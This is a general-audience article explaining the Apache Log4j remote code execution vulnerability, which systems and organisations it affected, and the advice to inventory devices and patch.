What is the Apache Log4j vulnerability and who is affected?

Cybersecurity is no longer just an issue for those in technological roles. With more businesses and people being reliant on technology for their day-to-day activities, cybersecurity is now part and parcel of modern life. This is why the log4j vulnerability has led to panic for millions of people. 

“The most serious vulnerability she has seen in her career. Already millions of attempts to exploit its vulnerability” 

Jen Easterly (director of U.S Cybersecurity and infrastructure security Agency)

The Apache Software Foundation, having developed one of the most-used web server platforms, expanded its platform to include a logging utility.

Log4j/Log4Shell is an open-source Java-based logging utility for recording events and errors, and communicating diagnostic information to admins/users. Essentially this piece of software holds information from the activities on that device, e.g., online games holding the log activity and typed commands into the console, or the 404-error message for a bad web link. Apache’s goal with this update was particularly to encourage more collaboration, transparency, freedom through custom coding and to be cost-effective for its users. 

Although this seems like a great idea, with Log4j gathering lots of sensitive user data it has drawn the attention of hackers. From stealing sensitive data, adding malicious content, to taking control of the system, the reality of Log4J is that it has made it easy for cybercriminals to abuse it.

The recent Remote Code Execution (RCE) vulnerability in the Log4j framework means hackers can remotely run code on vulnerable devices, which is concerning as Apache is one of the world’s most popular web servers and Log4j is used on many cloud services and games platforms, in addition to web sites.

The vulnerability has even affected companies like Microsoft, with hackers potential able to take over Minecraft servers. Hackers can use compromised machines for mining of cryptocurrencies such as Bitcoin, “hacktivists” could gather information on opposing parties/countries (Exploitation of Belgium Defence Ministry) and there are threats against health agencies such as the NHS.

“Everything across heavy industrial equipment, network servers, down to printers, and even your kid’s Raspberry Pi is potentially affected by this flaw. Some affected systems may be on-premises while others may be hosted in the cloud, but no matter where they are, the flaw is likely to have an impact” 

Glen Pendley, Deputy Chief Technology Officer at Tenable.

Although multinational organisations have the resources and funding to quickly patch and protect themselves against this threat, it is still possible for all other organisations to take the next steps in their cybersecurity.

Log4j, being a software library, is usually incorporated into other pieces of software so you may not realise that you’re running it. There are ways to see if your personal or business devices have the vulnerability. Start with an inventory of all of your devices, and your administrators can do tests to see if there your software incorporates the Log4j library. If there is a system with the Log4j software (even if it is part of another application) it has been suggested to treat this as vulnerable due to the servery of this risk – then update it. 

Cybersecurity company VMware encourages users to then patch the Log4j vulnerabilities, as even though they have reached out to their customers, they continue to see that many companies have not patched their systems to eliminate the vulnerability. 

Even though most companies have rushed to update their systems to prevent harm from this Log4j flaw, cybersecurity experts suggest that the industry will be managing the aftermath of the Log4j vulnerabilities for the next 3-5 years. Going forward the best advice to offer is to make sure your systems are up-to-date and have the right cyber security measures in place.